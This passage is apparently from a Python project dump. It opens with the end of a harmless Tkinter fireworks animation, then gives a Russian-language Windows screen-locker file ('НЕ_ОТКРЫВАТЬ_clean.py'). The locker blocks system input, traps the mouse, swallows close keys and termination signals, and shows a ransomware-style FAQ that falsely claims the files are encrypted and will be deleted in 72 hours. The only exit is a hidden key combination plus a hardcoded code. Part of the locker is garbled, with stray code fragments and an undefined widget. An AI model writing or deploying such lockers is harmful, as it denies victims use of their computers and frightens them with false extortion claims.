            delay = random.randint(600, 900)
            self.window.after(delay, self.round_spiral_patterns)
        else:
            self.window.after(1500, self.start_next_round)
    
    def round_flower_storms(self):
        """Round 3: Flower-like storm patterns"""
        if self.burst_count < 10:
            self.create_flower_burst()
            self.burst_count += 1
            delay = random.randint(300, 600)
            self.window.after(delay, self.round_flower_storms)
        else:
            self.window.after(1500, self.start_next_round)
    
    def create_classic_burst(self):
        """Create massive classic firework burst"""
        screen_width = self.window.winfo_screenwidth()
        screen_height = self.window.winfo_screenheight()
        
        colors = ['#FF0000', '#00FF00', '#0000FF', '#FFFF00', '#00FFFF',
                 '#FF00FF', '#FFA500', '#800080', '#FFFFFF', '#FF69B4']
        
        # Create 3-5 burst centers
        centers = []
        for _ in range(random.randint(3, 5)):
            center_x = random.randint(150, screen_width - 150)
            center_y = random.randint(150, screen_height - 250)
            centers.append((center_x, center_y))
        
        # Create 200-300 particles per center
        for center_x, center_y in centers:
            for _ in range(random.randint(200, 300)):
                angle = random.uniform(0, 2 * math.pi)
                speed = random.uniform(4, 12)
                size = random.randint(4, 9)
                color = random.choice(colors)
                
                particle = self.canvas.create_oval(
                    center_x - size, center_y - size,
                    center_x + size, center_y + size,
                    fill=color, outline=color
                )
                
                self.particles.append({
                    'id': particle,
                    'dx': speed * math.cos(angle),
                    'dy': speed * math.sin(angle),
                    'life': random.randint(70, 120),
                    'color': color,
                    'size': size
                })
        
        self.update_animation()
    
    def create_spiral_burst(self):
        """Create beautiful spiral pattern burst"""
        screen_width = self.window.winfo_screenwidth()
        screen_height = self.window.winfo_screenheight()
        
        center_x = random.randint(200, screen_width - 200)
        center_y = random.randint(200, screen_height - 300)
        
        colors = ['#FF6B6B', '#4ECDC4', '#45B7D1', '#F9A826', '#6C5CE7']
        
        # Create spiral pattern
        spiral_arms = 6
        particles_per_arm = 50
        
        for arm in range(spiral_arms):
            base_angle = (arm * 2 * math.pi) / spiral_arms
            
            for i in range(particles_per_arm):
                distance = i * 3
                angle = base_angle + (i * 0.1)
                speed = 4 + (i * 0.1)
                size = max(2, 6 - (i * 0.08))
                color = colors[arm % len(colors)]
                
                particle = self.canvas.create_oval(
                    center_x - size, center_y - size,
                    center_x + size, center_y + size,
                    fill=color, outline=color
                )
                
                self.particles.append({
                    'id': particle,
                    'dx': speed * math.cos(angle),
                    'dy': speed * math.sin(angle),
                    'life': random.randint(80, 140),
                    'color': color,
                    'size': size
                })
        
        self.update_animation()
    
    def create_flower_burst(self):
        """Create flower-like storm pattern"""
        screen_width = self.window.winfo_screenwidth()
        screen_height = self.window.winfo_screenheight()
        
        center_x = random.randint(250, screen_width - 250)
        center_y = random.randint(250, screen_height - 350)
        
        colors = ['#E91E63', '#9C27B0', '#673AB7', '#3F51B5', '#2196F3', '#00BCD4']
        
        # Create flower pattern with petals
        petals = 8
        particles_per_petal = 40
        
        for petal in range(petals):
            petal_angle = (petal * 2 * math.pi) / petals
            
            for i in range(particles_per_petal):
                # Flower shape equation
                t = i / particles_per_petal
                distance = 100 * math.sin(4 * t)
                angle = petal_angle + math.sin(8 * t) * 0.2
                
                speed = 3 + (t * 4)
                size = max(2, 5 - (t * 3))
                color = colors[petal % len(colors)]
                
                particle = self.canvas.create_oval(
                    center_x - size, center_y - size,
                    center_x + size, center_y + size,
                    fill=color, outline=color
                )
                
                self.particles.append({
                    'id': particle,
                    'dx': speed * math.cos(angle),
                    'dy': speed * math.sin(angle),
                    'life': random.randint(90, 160),
                    'color': color,
                    'size': size
                })
        
        self.update_animation()
    
    def grand_finale(self):
        """Grand finale with all patterns combined"""
        self.canvas.delete("all")
        self.canvas.create_text(
            self.window.winfo_screenwidth() // 2,
            100,
            text="🎆 ГРАНД ФИНАЛ! 🎆",
            fill="gold",
            font=("Arial", 36, "bold")
        )
        
        # Create massive combined burst
        self.create_classic_burst()
        self.window.after(500, self.create_spiral_burst)
        self.window.after(1000, self.create_flower_burst)
        self.window.after(2000, self.create_classic_burst)
        self.window.after(2500, self.create_spiral_burst)
        self.window.after(3000, self.create_flower_burst)
        
        # Show completion message
        self.window.after(8000, self.show_completion)
    
    def show_completion(self):
        """Show completion message"""
        self.canvas.create_text(
            self.window.winfo_screenwidth() // 2,
            self.window.winfo_screenheight() // 2,
            text="🎉 ШОУ ЗАВЕРШЕНО! \n3 ЭПИЧНЫХ РАУНДА! 🎉",
            fill="white",
            font=("Arial", 32, "bold"),
            justify="center"
        )
        self.window.after(4000, self.close_show)
    
    def update_animation(self):
        """Update particle animation"""
        if not self.window or not self.canvas:
            return
            
        to_remove = []
        
        for p in self.particles:
            p['life'] -= 1
            if p['life'] <= 0:
                self.canvas.delete(p['id'])
                to_remove.append(p)
            else:
                self.canvas.move(p['id'], p['dx'], p['dy'])
                p['dy'] += 0.12  # Gravity
        
        for p in to_remove:
            if p in self.particles:
                self.particles.remove(p)
        
        if self.particles:
            self.window.after(20, self.update_animation)
    
    def close_show(self):
        """Close the entire show"""
        self.music_playing = False
        if self.window:
            self.window.destroy()
        if self.root:
            self.root.quit()
            self.root.destroy()

def start_mega_fireworks():
    """Start the mega fireworks spectacle"""
    spectacle = MegaFireworksSpectacle()
    spectacle.start_spectacle()

if __name__ == "__main__":
    start_mega_fireworks()


НЕ_ОТКРЫВАТЬ_clean.py:
import tkinter as tk
from tkinter import messagebox
import sys
import os
import ctypes
import threading
import time
import subprocess
import pyttsx3
import signal
engine = pyttsx3.init()
engine.setProperty("rate", 150)
engine.setProperty("volume", 0.9)
kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
print("подождите...")


kernel32.SetConsoleCtrlHandler(None, True)
def setup_signal_handlers():
            signal.signal(signal.SIGINT, signal_handler)
            signal.signal(signal.SIGTERM, signal_handler)

            signal.signal(signal.SIGABRT, signal_handler)
            if hasattr(signal, "SIGBREAK"):
                signal.signal(signal.SIGBREAK, signal_handler)
            
def signal_handler(signum, frame):
                messagebox.showwarning("АХАХХАХАХ", "ты думал тебе поможет жалкий сигнал {signum}, глупенький?")
            
# Блокируем ввод на системном уровне
try:
    ctypes.windll.user32.BlockInput(True)
except:
    pass

# Проверяем доступность win32api для блокировки мыши
try:
    import win32api
    import win32con
    WIN32_AVAILABLE = True
except:
    WIN32_AVAILABLE = False
engine.say("Your Computer Was blocked!")
engine.runAndWait()

class UnclosableApp:
    def __init__(self):
        self.running = True
        self.root = tk.Tk()
        self.root.title("Ваш компьютер был заблокирован")
        self.root.attributes('-fullscreen', True)
        self.root.configure(bg='black')
        self.root.overrideredirect(True)
        setup_signal_handlers()


       
    



        

        
        # Делаем окно поверх всех окон
        self.root.attributes('-topmost', True)
        
        # Блокируем все способы закрытия
        self.root.protocol("WM_DELETE_WINDOW", self.prevent_close)
        self.root.bind("<Alt-F4>", self.prevent_close)
        self.root.bind("<Control-Alt-Delete>", self.intercept_ctrl_alt_del)
        self.root.bind("<Control-Shift-Escape>", self.intercept_ctrl_shift_esc)
        self.root.bind("<Escape>", self.prevent_close)
        self.root.bind("<Key>", self.handle_key_press)
        
        # Блокируем системные клавиши
        system_keys = ['<Control_L>', '<Control_R>', '<Alt_L>', '<Alt_R>', 
                      '<Win_L>', '<Win_R>', '<Shift_L>', '<Shift_R>']
        for key in system_keys:
            self.root.bind(key, self.intercept_system_keys)
        
        # Биндим комбинацию для секретного ввода
        self.root.bind('<Control-Shift-Alt-q>', self.activate_secret_input)
        self.root.bind('<Control-Shift-Alt-Q>', self.activate_secret_input)
        
        # Секретный код
        self.secret_code = "h3x9wjaqQkd;w3*@9e2q"
        self.entered_code = ""
        
        # Основной текст
        self.label = tk.Label(
            self.root, 
            text="ЗАБЛОКИРОВАНО!", 
            font=("Arial", 72, "bold"), 
            fg="red", 
            bg="black"
        )
        self.label.pack(expand=True)
        
        # Сообщение о разблокировке (красный текст между заголовком и полем ввода)
        self.unlock_label = tk.Label(
            self.root,
            text=" нажмите ctrl+shift+alt+q для разблокировки. Для дополнительной информации нажмите FAQ.",
            font=("Arial", 12),
            fg="red",
            bg="black"
        )
        self.unlock_label.pack(pady=10)
        
        # Переменные для секретного ввода
        self.secret_input_active = False
        self.secret_input = ""
        self.real_secret_code = "38352*(#&002jsiQE27"
        
    
        
        # Дополнительный текст снизу (пользователь может изменить)
        self.bottom_label = tk.Label(
            self.root,
            text="Введите секретный код для разблокировки вашего устройства.",
            font=("Arial", 16),
            fg="red",
            bg="black"
        )
        self.bottom_label.pack(side='bottom', pady=50)
        
        # Кнопка для открытия FAQ
        self.faq_button = tk.Button(
            self.root,
            text="FAQ",
            font=("Arial", 16),
            command=self.open_faq
        )
        self.faq_button.pack(side='bottom', pady=10)
        
        # Запускаем защитные механизмы
        self.start_protection_threads() #
        
        # Запускаем блокировку мыши
        threading.Thread(target=self.block_mouse_movement, daemon=True).start()
        
        # Запускаем таймер
        threading.Thread(target=self.timer_thread, daemon=True).start()
        
    def start_protection_threads(self):
        # Поток для поддержания фокуса
        threading.Thread(target=self.keep_focus, daemon=True).start()
        
    
        
        
    def keep_focus(self):
        while True:
            try:
                self.root.focus_force()
                time.sleep(0.1)
            except:
                pass
        
   

    
        
    
    def block_mouse_movement(self):
        """Блокируем движение мыши - ограничиваем в маленькой области"""
        while True:
            try:
                if WIN32_AVAILABLE:
                    # Получаем текущую позицию мыши
                    x, y = win32api.GetCursorPos()
                    
                    # Ограничиваем движение в небольшой области (50x50 пикселей)
                    max_x = min(x + 25, win32api.GetSystemMetrics(0))
                    min_x = max(x - 25, 0)
                    max_y = min(y + 25, win32api.GetSystemMetrics(1)) 
                    min_y = max(y - 25, 0)
                    
                    # Если мышь вышла за пределы - возвращаем обратно
                    if x < min_x or x > max_x or y < min_y or y > max_y:
                        center_x = (min_x + max_x) // 2
                        center_y = (min_y + max_y) // 2
                        win32api.SetCursorPos((center_x, center_y))
                    
                    time.sleep(0.1)
                else:
                    # Простой метод - двигаем к центру экрана
                    screen_width = self.root.winfo_screenwidth()
                    screen_height = self.root.winfo_screenheight()
                    center_x = screen_width // 2
                    center_y = screen_height // 2
                    
                    # Используем tkinter для перемещения мыши
                    self.root.event_generate('<Motion>', warp=True, x=center_x, y=center_y)
                    time.sleep(2)
            except:
                time.sleep(1)
        
    def prevent_close(self, event=None):
        return "break"
        
    def intercept_ctrl_alt_del(self, event):
        return "break"
        
    def intercept_ctrl_shift_esc(self, event):
        return "break"
        
    def intercept_system_keys(self, event):
        return "break"
        
    def activate_secret_input(self, event=None):
        """Активируем секретный ввод"""
        if not self.secret_input_active:
            self.secret_input_active = True
            self.secret_input = ""
            
            # Создаем поле для секретного ввода (сбоку)
            self.secret_input_label = tk.Label(
                self.root,
                text="Секретный код: ",
                font=("Arial", 16),
                fg="red",
                bg="black"
            )
            self.secret_input_label.place(x=50, y=200)
            
            self.secret_display = tk.Label(
                self.root,
                text="",
                font=("Arial", 16, "bold"),
                fg="green",
                bg="black"
            )
            self.secret_display.place(x=200, y=200)
            
            # Меняем обработчик клавиш для секретного ввода
            self.root.unbind("<Key>")
            self.root.bind("<Key>", self.handle_secret_input)
            
        return "break"
    
    def handle_secret_input(self, event):
        """Обработка ввода секретного кода"""
        if event.char:
            self.secret_input += event.char
            self.secret_display.config(text="*" * len(self.secret_input))
            
            # Проверяем код
            if self.secret_input == self.real_secret_code:
                self.real_unlock()
            elif len(self.secret_input) >= len(self.real_secret_code):
                # Сбрасываем если слишком длинный
                self.secret_input = ""
                self.secret_display.config(text="")
                
        elif event.keysym == 'BackSpace':
            self.secret_input = self.secret_input[:-1]
            self.secret_display.config(text="*" * len(self.secret_input))
            
        return "break"
    
    def real_unlock(self):
        """Настоящая разблокировка системы"""
        try:
            # Разблокируем ввод
            ctypes.windll.user32.BlockInput(False)
        except:
            pass
        
        # Создаем окно восстановления системы
        restore_window = tk.Toplevel(self.root)
        restore_window.attributes('-fullscreen', True)
        restore_window.configure(bg='black')
        restore_window.attributes('-topmost', True)
        
        # Текст восстановления
        restore_label = tk.Label(
            restore_window,
            text="Восстановление системы...",
            font=("Arial", 36, "bold"),
            fg="white",
            bg="black"
        )
        restore_label.pack(pady=100)
        
        # Простой текст вместо прогресс бара
        status_label = tk.Label(
            restore_window,
            text="Разблокировка завершена!",
            font=("Arial", 24),
            fg="white",
            bg="black"
        )
        status_label.pack(pady=20)
        
        # Немедленная разблокировка
        def unlock():
            time.sleep(2)  # Небольшая задержка для визуального эффекта
            restore_window.destroy()
            self.root.destroy()
            messagebox.showinfo("Разблокировано", "Компьютер разблокирован!")
            sys.exit(0)
        
        threading.Thread(target=unlock, daemon=True).start()
    
    def handle_key_press(self, event):
        # Клавиши для краша
        if event.char and event.char.lower() in ['q', 'й']:
            
            return "break"
            
        # Ввод букв и цифр для кода
        if event.char and (event.char.isalnum() or event.char in ['!', '@', '#', '$', '%', '^', '&', '*', '(', ')']):
            self.entered_code += event.char
            self.update_code_display()
            
            if len(self.entered_code) == len(self.secret_code):
                if self.entered_code == self.secret_code:
                    messagebox.showinfo("АХАХАХААХАХАХХ", "система разблокирована")
                    exit(1)
            
                else:
                    self.entered_code = ""
                    self.update_code_display()
                    messagebox.showerror("Ошибка", "Неверный код!ты никогда отсюда не выйдешь. никогда.сдесь нет секретного кода. только ctrl+alt+shift+q")
            return "break"
        
        # Очистка кода
        elif event.keysym == 'BackSpace':
            self.entered_code = self.entered_code[:-1]
            self.update_code_display()
            return "break"
            
        return "break"
            
    def update_code_display(self):
        self.code_label.config(text="Введите код: " + "*" * len(self.entered_code))
        
    def crash_app(self):
        # Принудительный краш(нет)
        messagebox.showerror("не-а")
        
    def safe_exit(self):
        # Безопасный выход
        try:
            hdddd = 87
        except:
            hddifunujcrheurneri = 8385638568
        finally:
            messagebox.showerror("HAHHAHHAHAHAH")
            exit()
            
    def run(self):
        try:
            self.root.mainloop()
        except:
            # Перезапуск при ошибках
            self.run()
            
    def timer_thread(self):
        # Ждем 72 часа (в секундах)
        time.sleep(72 * 60 * 60)
        # После 72 часов ничего не происходит
        pass
        
    def open_faq(self):
        """Открывает окно с часто задаваемыми вопросами"""
        faq_window = tk.Toplevel(self.root)
        faq_window.title("FAQ")
        faq_window.geometry("600x400")
        faq_window.configure(bg='black')
        faq_window.attributes('-topmost', True)
        
        # Заголовок
        title_label = tk.Label(
            faq_window,
            text="Часто Задаваемые Вопросы",
            font=("Arial", 24, "bold"),
            fg="white",
            bg="black"
        )
        title_label.pack(pady=20)
        
        # Вопросы и ответы
        faq_text = """
        В: Что произошло с моим компьютером?
        О: Ваш компьютер был заблокирован. 
        
        В: Как мне вернуть доступ к своим файлам?
        О: Для получения ключа для расшифровки, вы должны ввести секретный код
        
        В: Могу ли я сам расшифровать файлы без кода?
        О: Нет, вы не сможете расшифровать файлы без кода.
        
        В: Что произойдет, если я не введу секретный код?
        О: Если вы не введете секретный код в течение 72 часов, файлы будут удалены.

        В:как получить ключ?
        О:сам не знаю.
        """
        
        # Текст FAQ
        faq_label = tk.Label(
            faq_window,
            text=faq_text,
            font=("Arial", 12),
            fg="red",
            bg="black",
            justify="left"
        )
        faq_label.pack(pady=20)
        
        # Кнопка закрытия
        close_button = tk.Button(
            faq_window,
            text="Закрыть",
            font=("Arial", 16),
            command=faq_window.destroy
        )
        close_button.pack(pady=20)
 
# Создаем интерфейс
        self.create_widgets()
       
        # Блокируем мышь если доступно win32api
        if WIN32_AVAILABLE:
            self.block_mouse_thread = threading.Thread(target=self.block_mouse)
            self.block_mouse_thread.daemon = True
            self.block_mouse_thread.start()
       
        # Запускаем проверку процессов
        self.check_processes()
       
        # Запускаем Tkinter
        self.root.mainloop()
   
    def create_widgets(self):
        # Сообщение о блокировке
        message_label = tk.Label(
            self.root,
            text="ВАШ КОМПЬЮТЕР БЫЛ ЗАБЛОКИРОВАН!\n\nДля разблокировки введите код.для доп информации нажмите FAQ.",
            font=("Arial", 24, "bold"),
            fg="red",
            bg="black",
            justify=tk.CENTER
        )
        message_label.pack(expand=True)
       
        # Таймер (для видимости)
        self.timer_label = tk.Label(
            self.root,
            text="",
            font=("Arial", 18),
            fg="red",
            bg="black"
        )
        self.timer_label.pack(pady=20)
       
        # Обновляем таймер
        self.update_timer()
   
    def update_timer(self):
        if self.running:
            current_time = time.strftime("%H:%M:%S")
            self.timer_label.config(text=f"Время: {current_time}")
            self.root.after(1000, self.update_timer)
   
    def block_mouse(self):
        while self.running:
            try:
                # Блокируем мышь в центре экрана
                if WIN32_AVAILABLE:
                    win32api.SetCursorPos(
                        (self.root.winfo_screenwidth() // 2,
                         self.root.winfo_screenheight() // 2)
                    )
                time.sleep(0.1)
            except:
                pass
   
    def check_processes(self):
        print("bar")
    
       
               
           
       
   
    def on_closing(self):
        # Игнорируем попытки закрытия
        messagebox.showwarning("Ошибка", "Закрытие невозможно!")
   
    def destroy(self):
        self.running = False
        try:
            ctypes.windll.user32.BlockInput(False)
        except:
            pass
        self.root.quit()

# Запуск приложения
if __name__ == "__main__":
    app = UnclosableApp()
    # Вешаем обработчик на попытку закрытия
    app.root.protocol("WM_DELETE_WINDOW", app.on_closing)
    app.root.mainloop()
    app.block_mouse()
    time.sleep(10)
    exit(0)


звуки(описание):
win8bit.mp3:
8 битная победа. всего 2 секунды!

gameover.mp3:
ретро стиль(8 бит) проигрыша -4 секунды.
gimnrussia.mp3:
гимн россии


